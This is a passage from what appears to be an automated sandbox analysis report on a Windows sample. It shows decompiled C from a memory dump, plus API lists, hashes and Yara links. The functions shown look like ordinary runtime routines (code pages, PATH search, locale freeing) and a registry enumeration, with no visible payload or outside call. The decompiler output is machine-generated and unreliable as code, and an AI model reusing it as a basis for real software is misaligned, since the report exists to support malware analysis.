						E00B50985(_t88);
					}
				}
				return E00B4AE43( *(_t140 + 0x48) ^ _t140);
			}

APIs

GetCurrentProcess.KERNEL32(?), ref: 00B429DC
IsWow64Process.KERNEL32(00000000), ref: 00B429E3
RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00000109,00000000), ref: 00B42A04
RegOpenKeyA.ADVAPI32(80000002,00000000,00000000), ref: 00B42A17
RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 00B42A3B
GetCurrentProcess.KERNEL32(?), ref: 00B42AD1
IsWow64Process.KERNEL32(00000000), ref: 00B42AD8
RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00000101,?), ref: 00B42AF9
RegOpenKeyA.ADVAPI32(80000002,00000000,?), ref: 00B42B0C
RegCloseKey.ADVAPI32(00000000,2A230C1C,00000000,?), ref: 00B42B4F
RegCloseKey.ADVAPI32(?), ref: 00B42B55

Strings

*, xrefs: 00B42A7D
-, xrefs: 00B42B2F

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: OpenProcess$CloseCurrentWow64$Enum
String ID: *$-
API String ID: 1684924610-2125244407
Opcode ID: 07900d3cdc887d70082146324769215d758512a23c92be9289278a7819d02724
Instruction ID: 508dfdbee0269bc3440d39a4231d607275d59c7a55bb8b1605e9393ac0a5355d
Opcode Fuzzy Hash: 07900d3cdc887d70082146324769215d758512a23c92be9289278a7819d02724
Instruction Fuzzy Hash: 635134704083459FDB15CF29DC44A6BBBE8FF99344F40059DF8C193252EB319A49EB62

Uniqueness

Uniqueness Score: -1.00%

Function 00B55707, Relevance: 22.8, APIs: 15, Instructions: 343
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00B55707(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				intOrPtr* _v48;
				char* _v52;
				intOrPtr* _v56;
				signed int _v60;
				intOrPtr _v64;
				signed int _v68;
				signed int* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				char _v92;
				signed int _t118;
				char _t140;
				signed short _t143;
				signed int _t144;
				void* _t147;
				void* _t150;
				void* _t153;
				void* _t154;
				void* _t157;
				signed int _t159;
				intOrPtr* _t160;
				signed char _t177;
				signed int* _t180;
				char* _t183;
				signed char _t184;
				void* _t191;
				char _t193;
				void* _t195;
				signed int* _t197;
				intOrPtr _t198;
				intOrPtr _t202;
				short* _t206;
				intOrPtr _t207;
				signed int _t208;
				signed char _t215;
				char _t216;
				intOrPtr _t217;
				void* _t220;
				signed int _t221;
				signed char* _t223;
				int* _t225;
				signed char* _t237;
				short* _t238;
				intOrPtr* _t240;
				char* _t241;
				char* _t242;
				intOrPtr* _t246;
				signed int _t247;
				short* _t248;
				void* _t250;
				signed int _t251;
				signed int _t252;
				void* _t253;
				void* _t254;

				_t118 =  *0xb69014; // 0xce6f0fb5
				_v8 = _t118 ^ _t252;
				_t240 = _a4;
				_t193 = 0;
				_v56 = _t240;
				_v32 = 0;
				_v36 = 0;
				_t120 =  *((intOrPtr*)(_t240 + 0xa8));
				_v40 = 0;
				_v44 = 0;
				_v92 = _t240;
				_v88 = 0;
				if( *((intOrPtr*)(_t240 + 0xa8)) == 0) {
					__eflags =  *((intOrPtr*)(_t240 + 0x8c));
					if( *((intOrPtr*)(_t240 + 0x8c)) != 0) {
						asm("lock dec dword [eax]");
					}
					 *((intOrPtr*)(_t240 + 0x8c)) = _t193;
					__eflags = 0;
					 *((intOrPtr*)(_t240 + 0x90)) = _t193;
					 *_t240 = 0xb34fd8;
					 *((intOrPtr*)(_t240 + 0x94)) = 0xb35258;
					 *((intOrPtr*)(_t240 + 0x98)) = 0xb353d8;
					 *((intOrPtr*)(_t240 + 4)) = 1;
					L48:
					return E00B4AE43(_v8 ^ _t252);
				}
				_push(__edi);
				_t225 = _t240 + 8;
				_v48 = 0;
				if( *_t225 != 0) {
					L3:
					_v48 = E00B598AF(1, 4);
					E00B564B8(_t193);
					_v32 = E00B598AF(0x180, 2);
					E00B564B8(_t193);
					_v36 = E00B598AF(0x180, 1);
					E00B564B8(_t193);
					_v40 = E00B598AF(0x180, 1);
					E00B564B8(_t193);
					_v44 = E00B598AF(0x101, 1);
					E00B564B8(_t193);
					_t254 = _t253 + 0x3c;
					if(_v48 == _t193 || _v32 == _t193) {
						L43:
						E00B564B8(_v48);
						E00B564B8(_v32);
						E00B564B8(_v36);
						E00B564B8(_v40);
						_t193 = 1;
						__eflags = 1;
						goto L44;
					} else {
						_t202 = _v44;
						if(_t202 == 0 || _v36 == _t193 || _v40 == _t193) {
							goto L43;
						} else {
							_t140 = _t193;
							do {
								 *((char*)(_t140 + _t202)) = _t140;
								_t140 = _t140 + 1;
							} while (_t140 < 0x100);
							if(GetCPInfo( *_t225,  &_v28) == 0) {
								goto L43;
							}
							_t143 = _v28;
							if(_t143 > 5) {
								goto L43;
							}
							_t144 = _t143 & 0x0000ffff;
							_v60 = _t144;
							if(_t144 <= 1) {
								L22:
								_v52 = _v44 + 1;
								_t147 = E00B59335(_t193, _t225, _t240, _t272, _t193,  *((intOrPtr*)(_t240 + 0xa8)), 0x100, _v44 + 1, 0xff, _v36 + 0x81, 0xff,  *_t225, _t193);
								_t254 = _t254 + 0x24;
								_t273 = _t147;
								if(_t147 == 0) {
									goto L43;
								}
								_t150 = E00B59335(_t193, _t225, _t240, _t273, _t193,  *((intOrPtr*)(_t240 + 0xa8)), 0x200, _v52, 0xff, _v40 + 0x81, 0xff,  *_t225, _t193);
								_t254 = _t254 + 0x24;
								_t274 = _t150;
								if(_t150 == 0) {
									goto L43;
								}
								_v76 = _v32 + 0x100;
								_t153 = E00B5BFC9(_t193, _t225, _t240, _t274, _t193, 1, _v44, 0x100, _v32 + 0x100,  *_t225, _t193);
								_t254 = _t254 + 0x1c;
								if(_t153 == 0) {
									goto L43;
								}
								_t154 = _v32;
								_t206 = _t154 + 0xfe;
								 *_t206 = 0;
								_t220 = _v40;
								_v80 = _t206;
								_t207 = _v36;
								_t241 = _t207 + 0x80;
								 *((char*)(_t207 + 0x7f)) = _t193;
								 *((char*)(_t220 + 0x7f)) = _t193;
								 *_t241 = _t193;
								_v84 = _t241;
								_t242 = _t220 + 0x80;
								_v52 = _t242;
								 *_t242 = _t193;
								if(_v60 <= 1) {
									L39:
									_t208 = 0x3f;
									_push(0x1f);
									_t157 = memcpy(_v32, _v32 + 0x200, _t208 << 2);
									_push(0x1f);
									asm("movsw");
									memcpy(_t157, _t157 + 0x100, 0 << 2);
									asm("movsw");
									asm("movsb");
									_t159 = memcpy(_t220, _t220 + 0x100, 0 << 2);
									asm("movsw");
									asm("movsb");
									_t246 = _v56;
									if( *((intOrPtr*)(_t246 + 0x8c)) != 0) {
										asm("lock xadd [ecx], eax");
										if((_t159 | 0xffffffff) == 0) {
											E00B564B8( *((intOrPtr*)(_t246 + 0x90)) - 0xfe);
											E00B564B8( *((intOrPtr*)(_t246 + 0x94)) - 0x80);
											E00B564B8( *((intOrPtr*)(_t246 + 0x98)) - 0x80);
											E00B564B8( *((intOrPtr*)(_t246 + 0x8c)));
										}
									}
									_t160 = _v48;
									 *_t160 = 1;
									 *((intOrPtr*)(_t246 + 0x8c)) = _t160;
									 *_t246 = _v76;
									 *((intOrPtr*)(_t246 + 0x90)) = _v80;
									 *((intOrPtr*)(_t246 + 0x94)) = _v84;
									 *((intOrPtr*)(_t246 + 0x98)) = _v52;
									 *(_t246 + 4) = _v60;
									L44:
									E00B564B8(_v44);
									goto L48;
								}
								if( *_t225 != 0xfde9) {
									_t237 =  &_v22;
									__eflags = _v22 - _t193;
									if(_v22 == _t193) {
										goto L39;
									}
									_t195 = _v32;
									while(1) {
										_t177 = _t237[1];
										__eflags = _t177;
										if(_t177 == 0) {
											break;
										}
										_t247 =  *_t237 & 0x000000ff;
										_v68 = _t247;
										__eflags = _t247 - (_t177 & 0x000000ff);
										if(_t247 > (_t177 & 0x000000ff)) {
											L37:
											_t237 =  &(_t237[2]);
											__eflags =  *_t237;
											if( *_t237 != 0) {
												continue;
											}
											break;
										}
										_v64 = _t207;
										_t180 = _t220 + 0x80 + _t247;
										_t215 = _t207 - _t220;
										__eflags = _t215;
										_t221 = _v68;
										_t248 = _t195 - 0xffffff00 + _t247 * 2;
										_v72 = _t180;
										_t197 = _t180;
										do {
											 *_t248 = 0x8000;
											_t248 = _t248 + 2;
											 *(_t197 + _t215) = _t221;
											 *_t197 = _t221;
											_t221 = _t221 + 1;
											_t197 =  &(_t197[0]);
											__eflags = _t221 - (_t237[1] & 0x000000ff);
										} while (_t221 <= (_t237[1] & 0x000000ff));
										_t220 = _v40;
										_t207 = _v36;
										_t195 = _v32;
										goto L37;
									}
									L38:
									_t193 = 0;
									goto L39;
								}
								_t198 = _v52;
								_t238 = _t154 + 0x284;
								_t216 = 0xc2;
								_t250 = _t207 - _t220;
								do {
									_t183 = _t198 + _t216;
									 *_t238 = 0x8000;
									 *((char*)(_t250 + _t183)) = _t216;
									_t238 = _t238 + 2;
									 *_t183 = _t216;
									_t216 = _t216 + 1;
								} while (_t216 < 0xf5);
								_t220 = _v40;
								goto L38;
							}
							_t272 =  *_t225 - 0xfde9;
							if( *_t225 != 0xfde9) {
								_t223 =  &_v22;
								__eflags = _v22 - _t193;
								if(__eflags == 0) {
									goto L22;
								}
								_t217 = _v44;
								while(1) {
									_t184 = _t223[1];
									__eflags = _t184;
									if(__eflags == 0) {
										break;
									}
									_t251 =  *_t223 & 0x000000ff;
									__eflags = _t251 - (_t184 & 0x000000ff);
									if(_t251 > (_t184 & 0x000000ff)) {
										L20:
										_t223 =  &(_t223[2]);
										__eflags =  *_t223 - _t193;
										if(__eflags != 0) {
											continue;
										}
										break;
									} else {
										goto L19;
									}
									do {
										L19:
										 *((char*)(_t251 + _t217)) = 0x20;
										_t251 = _t251 + 1;
										__eflags = _t251 - (_t223[1] & 0x000000ff);
									} while (_t251 <= (_t223[1] & 0x000000ff));
									goto L20;
								}
								_t240 = _v56;
								goto L22;
							}
							E00B4D0F0(_t225, _v44 - 0xffffff80, 0x20, 0x80);
							_t254 = _t254 + 0xc;
							goto L22;
						}
					}
				}
				_t191 = E00B5EDC5(0, _t225, _t240,  &_v92, 0, _t120, 0x1004, _t225);
				_t254 = _t253 + 0x14;
				if(_t191 != 0) {
					goto L43;
				}
				goto L3;
			}

APIs

_free.LIBCMT ref: 00B55777
_free.LIBCMT ref: 00B5578C
_free.LIBCMT ref: 00B557A1
_free.LIBCMT ref: 00B557B6
_free.LIBCMT ref: 00B557CB
GetCPInfo.KERNEL32(?,?), ref: 00B55815

Part of subcall function 00B5EDC5: _free.LIBCMT ref: 00B5EE30

_free.LIBCMT ref: 00B55A59
_free.LIBCMT ref: 00B55A6C
_free.LIBCMT ref: 00B55A7A
_free.LIBCMT ref: 00B55A85
_free.LIBCMT ref: 00B55AC7
_free.LIBCMT ref: 00B55ACF
_free.LIBCMT ref: 00B55AD7
_free.LIBCMT ref: 00B55ADF
_free.LIBCMT ref: 00B55AED

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 83fbf2b518edeb2ef468c8d234b7724c714d3b6318bd5ae15a036acf495d977f
Instruction ID: bbfc03ec602180fa413a76a94781e5647c74f5fd3844af58e60bff97b18200fe
Opcode Fuzzy Hash: 83fbf2b518edeb2ef468c8d234b7724c714d3b6318bd5ae15a036acf495d977f
Instruction Fuzzy Hash: 2ED19C71D006459FDF21DFA4C881BEEBBF4FF08302F5441E9E994AB292D675A849CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B56AD0, Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 268
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00B56AD0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, char* _a8, intOrPtr* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v12;
				char _v16;
				char _v17;
				signed int _v24;
				signed int _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr* _v44;
				signed int* _v48;
				signed int _t45;
				intOrPtr* _t52;
				signed int* _t53;
				signed int* _t55;
				void* _t62;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t69;
				intOrPtr _t70;
				void* _t72;
				signed int* _t75;
				intOrPtr _t78;
				char _t82;
				void* _t84;
				void* _t87;
				signed int _t92;
				intOrPtr* _t94;
				signed int _t102;
				intOrPtr* _t107;
				void* _t111;
				intOrPtr* _t112;
				void* _t125;
				intOrPtr* _t126;
				void* _t127;
				intOrPtr* _t129;
				signed int _t130;
				void* _t132;
				char* _t134;
				intOrPtr* _t135;
				signed int _t136;
				void* _t139;
				void* _t140;
				void* _t141;
				void* _t142;
				void* _t143;

				L0:
				while(1) {
					L0:
					_t45 =  *0xb69014; // 0xce6f0fb5
					_v8 = _t45 ^ _t136;
					_t134 = _a8;
					_v32 = _t134;
					_v36 = _a16;
					_t129 = _a12;
					_v44 = _t129;
					if(_t134 == 0) {
						break;
					}
					L2:
					if( *_t134 == 0 || _t129 == 0) {
						break;
					} else {
						L4:
						_t52 =  *_t129;
						if(_t52 == 0) {
							break;
						} else {
							L5:
							_t53 = E00B55BBD();
							_v48 = _t53;
							if( *_t52 != 0) {
								L7:
								_push(_v36);
								_t92 =  *_t53;
								 *_t53 =  *_t53 & 0x00000000;
								_push(_t129);
								_v24 = _t92;
								_t130 = E00B56AC5(_a4, _t134);
								_t140 = _t139 + 0x10;
								if(_t130 != 0xffffffff) {
									L50:
									_t55 = _v48;
									if( *_t55 == 0 && _t92 != 0) {
										 *_t55 = _t92;
									}
									goto L54;
								} else {
									L8:
									if( *(E00B55BBD()) != 2 || E00B4CCD0(_t134, 0x5c) != 0 || E00B4CCD0(_t134, 0x2f) != 0 ||  *((char*)(_t134 + 1)) == 0x3a) {
										L12:
										_t130 = _t130 | 0xffffffff;
										goto L50;
									} else {
										L13:
										_v16 = 0x48544150;
										_t14 =  &_v16; // 0x48544150
										_v12 = 0;
										_v28 = 0;
										_t62 = E00B5185E( &_v28, 0, _t14);
										_t102 = _v28;
										_t141 = _t140 + 0xc;
										if(_t62 == 0) {
											L16:
											if(_t102 != 0) {
												L18:
												_t135 = E00B598AF(0x104, 1);
												if(_t135 == 0) {
													L47:
													_t130 = _t130 | 0xffffffff;
													goto L48;
												} else {
													L19:
													_push(0x103);
													_push(_t135);
													_t66 = E00B61446(_v28);
													_t142 = _t141 + 0xc;
													_v40 = _t66;
													if(_t66 != 0) {
														L20:
														_t94 = _v32;
														L21:
														while( *_t135 != 0) {
															_t107 = _t135;
															_t22 = _t107 + 1; // 0x1
															_t125 = _t22;
															do {
																L23:
																_t67 =  *_t107;
																_t107 = _t107 + 1;
															} while (_t67 != 0);
															_t23 = _t135 - 1; // -1
															_t132 = _t23 + _t107 - _t125;
															if(_t132 == E00B65190(_t135, 0x5c) || _t132 == E00B65190(_t135, 0x2f)) {
																L27:
																_t126 = _t135;
																_t26 = _t126 + 1; // 0x1
																_t111 = _t26;
																do {
																	L28:
																	_t69 =  *_t126;
																	_t126 = _t126 + 1;
																} while (_t69 != 0);
																_t127 = _t126 - _t111;
																_t112 = _t94;
																_t130 = _t112 + 1;
																do {
																	L30:
																	_t70 =  *_t112;
																	_t112 = _t112 + 1;
																} while (_t70 != 0);
																if(_t112 - _t130 + _t127 >= 0x104) {
																	break;
																} else {
																	L32:
																	_t72 = E00B60E2C(_t135, 0x104, _t94);
																	_t141 = _t142 + 0xc;
																	if(_t72 != 0) {
																		goto L57;
																	} else {
																		L33:
																		_t75 = E00B55BBD();
																		_push(_v36);
																		_push(_v44);
																		 *_t75 =  *_t75 & 0x00000000;
																		_t130 = E00B56AC5(_a4, _t135);
																		_t143 = _t141 + 0x10;
																		if(_t130 != 0xffffffff) {
																			L56:
																			_t92 = _v24;
																			L48:
																			E00B564B8(_t135);
																			_t102 = _v28;
																			goto L49;
																		} else {
																			L34:
																			if( *(E00B55BBD()) == 2 ||  *((intOrPtr*)(E00B55BAA())) == 0x15) {
																				L45:
																				_push(0x103);
																				_push(_t135);
																				_t78 = E00B61446(_v40);
																				_t142 = _t143 + 0xc;
																				_v40 = _t78;
																				if(_t78 != 0) {
																					continue;
																				} else {
																					break;
																				}
																			} else {
																				L36:
																				_t32 = _t135 + 1; // 0x1
																				_t130 = _t32;
																				if(E00B4CCD0(_t135, 0x2f) != _t135) {
																					L38:
																					_v17 = 0;
																				} else {
																					L37:
																					_t84 = E00B4CCD0(_t130, 0x2f);
																					_v17 = 1;
																					if(_t84 != _t130) {
																						goto L38;
																					}
																				}
																				L39:
																				if(E00B4CCD0(_t135, 0x5c) != _t135 || E00B4CCD0(_t130, 0x5c) != _t130) {
																					_t82 = 0;
																				} else {
																					_t82 = 1;
																				}
																				if(_v17 != 0 || _t82 != 0) {
																					goto L45;
																				} else {
																					break;
																				}
																			}
																		}
																	}
																}
															} else {
																L26:
																_v32 = 0x5c;
																_t87 = E00B60E2C(_t135, 0x104,  &_v32);
																_t141 = _t142 + 0xc;
																if(_t87 != 0) {
																	goto L57;
																} else {
																	goto L27;
																}
															}
															goto L55;
														}
														L46:
														_t92 = _v24;
													}
													goto L47;
												}
											} else {
												goto L17;
											}
										} else {
											L14:
											if(_t62 == 0x16) {
												L57:
												_push(0);
												_push(0);
												_push(0);
												_push(0);
												_push(0);
												E00B52919();
												asm("int3");
												L58:
												_push(_t136);
												continue;
											} else {
												L15:
												L17:
												_t130 = _t130 | 0xffffffff;
												L49:
												E00B564B8(_t102);
												_v28 = _v28 & 0x00000000;
												goto L50;
											}
										}
									}
								}
							} else {
								L6:
								 *_t53 = 0x16;
								E00B528EC();
								L54:
							}
						}
					}
					L55:
					return E00B4AE43(_v8 ^ _t136);
					L59:
				}
				L1:
				 *(E00B55BBD()) = 0x16;
				E00B528EC();
				goto L55;
			}

APIs

_free.LIBCMT ref: 00B56D55

Part of subcall function 00B564B8: RtlFreeHeap.NTDLL(00000000,00000000,?,00B5B9CA,?,00000000,?,?,?,00B5BC6F,?,00000007,?,?,00B5C2E4,?), ref: 00B564CE
Part of subcall function 00B564B8: GetLastError.KERNEL32(?,?,00B5B9CA,?,00000000,?,?,?,00B5BC6F,?,00000007,?,?,00B5C2E4,?,?), ref: 00B564E0

_free.LIBCMT ref: 00B56D5F

Strings

PATH, xrefs: 00B56BA3, 00B56BA9
\, xrefs: 00B56C4A

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: PATH$\
API String ID: 776569668-1896636505
Opcode ID: 8942af9c3ccdf98af7fda7c87b982be8e3a86145123ddf7a20b95006afab6747
Instruction ID: 8ec19e3b9b9ac156834a5a7636d16adb8267a0018a23ed51947e9fd806e3613e
Opcode Fuzzy Hash: 8942af9c3ccdf98af7fda7c87b982be8e3a86145123ddf7a20b95006afab6747
Instruction Fuzzy Hash: F4813931A002055EEF35AF68DC42BBE7BF5DF02322F5405E9ED50AB2C2EB758D498661

Uniqueness

Uniqueness Score: -1.00%

Function 00B5C14B, Relevance: 19.6, APIs: 13, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B5C14B(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0xb690c0) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E00B564B8(_t46);
							E00B5B26F( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E00B564B8(_t47);
							E00B5B726( *((intOrPtr*)(_t74 + 0x88)));
						}
						E00B564B8( *((intOrPtr*)(_t74 + 0x7c)));
						E00B564B8( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E00B564B8( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E00B564B8( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E00B564B8( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E00B564B8( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E00B5C2BE( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0xb693d8) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E00B564B8(_t31);
							E00B564B8( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t22 = _t70 - 4; // 0x79f8
						_t29 =  *_t22;
						if(_t29 != 0 &&  *_t29 == 0) {
							E00B564B8(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E00B564B8(_t74);
			}

0x00b5c153
0x00b5c157
0x00b5c15f
0x00b5c168
0x00b5c16d
0x00b5c174
0x00b5c17c
0x00b5c184
0x00b5c18f
0x00b5c195
0x00b5c196
0x00b5c19e
0x00b5c1a6
0x00b5c1b1
0x00b5c1b7
0x00b5c1bb
0x00b5c1c6
0x00b5c1cc
0x00b5c16d
0x00b5c1cd
0x00b5c1d5
0x00b5c1e8
0x00b5c1fb
0x00b5c209
0x00b5c214
0x00b5c219
0x00b5c222
0x00b5c22a
0x00b5c22b
0x00b5c231
0x00b5c234
0x00b5c237
0x00b5c23e
0x00b5c240
0x00b5c244
0x00b5c24c
0x00b5c253
0x00b5c259
0x00b5c25a
0x00b5c25a
0x00b5c261
0x00b5c263
0x00b5c263
0x00b5c268
0x00b5c270
0x00b5c275
0x00b5c276
0x00b5c276
0x00b5c279
0x00b5c27c
0x00b5c27f
0x00b5c282
0x00b5c282
0x00b5c294

APIs

___free_lconv_mon.LIBCMT ref: 00B5C18F

Part of subcall function 00B5B26F: _free.LIBCMT ref: 00B5B28C
Part of subcall function 00B5B26F: _free.LIBCMT ref: 00B5B29E
Part of subcall function 00B5B26F: _free.LIBCMT ref: 00B5B2B0
Part of subcall function 00B5B26F: _free.LIBCMT ref: 00B5B2C2
Part of subcall function 00B5B26F: _free.LIBCMT ref: 00B5B2D4
Part of subcall function 00B5B26F: _free.LIBCMT ref: 00B5B2E6
Part of subcall function 00B5B26F: _free.LIBCMT ref: 00B5B2F8
Part of subcall function 00B5B26F: _free.LIBCMT ref: 00B5B30A
Part of subcall function 00B5B26F: _free.LIBCMT ref: 00B5B31C
Part of subcall function 00B5B26F: _free.LIBCMT ref: 00B5B32E
Part of subcall function 00B5B26F: _free.LIBCMT ref: 00B5B340
Part of subcall function 00B5B26F: _free.LIBCMT ref: 00B5B352
Part of subcall function 00B5B26F: _free.LIBCMT ref: 00B5B364

_free.LIBCMT ref: 00B5C184

Part of subcall function 00B564B8: RtlFreeHeap.NTDLL(00000000,00000000,?,00B5B9CA,?,00000000,?,?,?,00B5BC6F,?,00000007,?,?,00B5C2E4,?), ref: 00B564CE
Part of subcall function 00B564B8: GetLastError.KERNEL32(?,?,00B5B9CA,?,00000000,?,?,?,00B5BC6F,?,00000007,?,?,00B5C2E4,?,?), ref: 00B564E0

_free.LIBCMT ref: 00B5C1A6
_free.LIBCMT ref: 00B5C1BB
_free.LIBCMT ref: 00B5C1C6
_free.LIBCMT ref: 00B5C1E8
_free.LIBCMT ref: 00B5C1FB
_free.LIBCMT ref: 00B5C209
_free.LIBCMT ref: 00B5C214
_free.LIBCMT ref: 00B5C24C
_free.LIBCMT ref: 00B5C253
_free.LIBCMT ref: 00B5C270
_free.LIBCMT ref: 00B5C288

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 5892d1009085a65f9e886d73236a243dda42ab6e66a82ffe65d6dbeff9c2ae00
Instruction ID: 1c45d8150240bda2b6ba814763cf451210cf93eeca270e3b0db7e43555373949
Opcode Fuzzy Hash: 5892d1009085a65f9e886d73236a243dda42ab6e66a82ffe65d6dbeff9c2ae00
Instruction Fuzzy Hash: ED316F32500B049FEF20AA79D845B5A7BEAEF01352F5084D9FD58D7262DF79AC488B20

Uniqueness

Uniqueness Score: -1.00%

Function 00B56543, Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00B56543(intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				signed int _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int* _v24;
				long _v28;
				long _v32;
				signed int _v36;
				void* _v44;
				void* _v48;
				signed int _v64;
				short _v66;
				char _v116;
				long _v196;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				signed int _t110;
				signed int _t111;
				signed int _t112;
				signed int _t114;
				signed int _t115;
				signed int _t116;
				signed int _t119;
				signed int _t127;
				signed int _t132;
				intOrPtr* _t133;
				signed int _t141;
				void* _t147;
				signed int _t150;
				signed int _t159;
				void* _t162;
				signed int _t163;
				intOrPtr* _t164;
				intOrPtr _t168;
				signed int _t177;
				signed int _t188;
				intOrPtr* _t189;
				signed int _t191;
				signed int _t192;
				signed int _t193;
				signed int _t197;
				signed int _t199;
				signed int _t201;
				signed int _t202;
				signed int _t206;
				signed int _t207;
				long _t208;
				long _t210;
				void* _t212;
				signed int* _t214;
				signed int _t215;
				signed int _t220;
				long _t223;
				signed int* _t227;
				void* _t234;
				signed int _t238;
				signed int _t239;
				signed int _t240;
				signed int _t252;
				void* _t257;
				signed int _t258;
				signed char _t261;
				void* _t264;
				signed int _t266;
				signed int _t267;
				char _t269;
				void* _t270;
				unsigned int _t272;
				signed int _t274;
				signed int* _t275;
				unsigned int _t277;
				signed int _t280;
				void* _t285;
				signed int _t287;
				void* _t290;
				void* _t292;
				void* _t293;
				void* _t294;

				_push(_t217);
				_t280 = _a8;
				if(_t280 != 0) {
					__eflags =  *_t280;
					if( *_t280 == 0) {
						goto L1;
					} else {
						_t111 = _a12;
						__eflags = _t111;
						if(_t111 == 0) {
							goto L1;
						} else {
							_t112 =  *_t111;
							__eflags = _t112;
							if(_t112 == 0) {
								goto L1;
							} else {
								__eflags =  *_t112;
								if( *_t112 == 0) {
									goto L1;
								} else {
									_t266 = E00B65190(_t280, 0x5c);
									_t114 = E00B65190(_t280, 0x2f);
									_t293 = _t292 + 0x10;
									_t206 = _t280;
									__eflags = _t114;
									if(_t114 != 0) {
										__eflags = _t266;
										if(_t266 == 0) {
											L20:
											_t266 = _t114;
										} else {
											__eflags = _t114 - _t266;
											if(_t114 > _t266) {
												goto L20;
											}
										}
										goto L21;
									} else {
										__eflags = _t266;
										if(_t266 != 0) {
											L21:
											asm("sbb esi, esi");
											_t280 =  ~(_t280 - _t206) & _t206;
											_t115 = E00B65190(_t266, 0x2e);
											__eflags = _t115;
											if(_t115 == 0) {
												_t220 = _t206;
												_t257 = _t220 + 1;
												do {
													_t116 =  *_t220;
													_t220 = _t220 + 1;
													__eflags = _t116;
												} while (_t116 != 0);
												_v8 = _t220 - _t257 + 5;
												_t267 = E00B598AF(_t220 - _t257 + 5, 1);
												_pop(_t223);
												__eflags = _t267;
												if(_t267 != 0) {
													_t207 = _v8;
													_t119 = E00B56383(_t267, _t207, _t206);
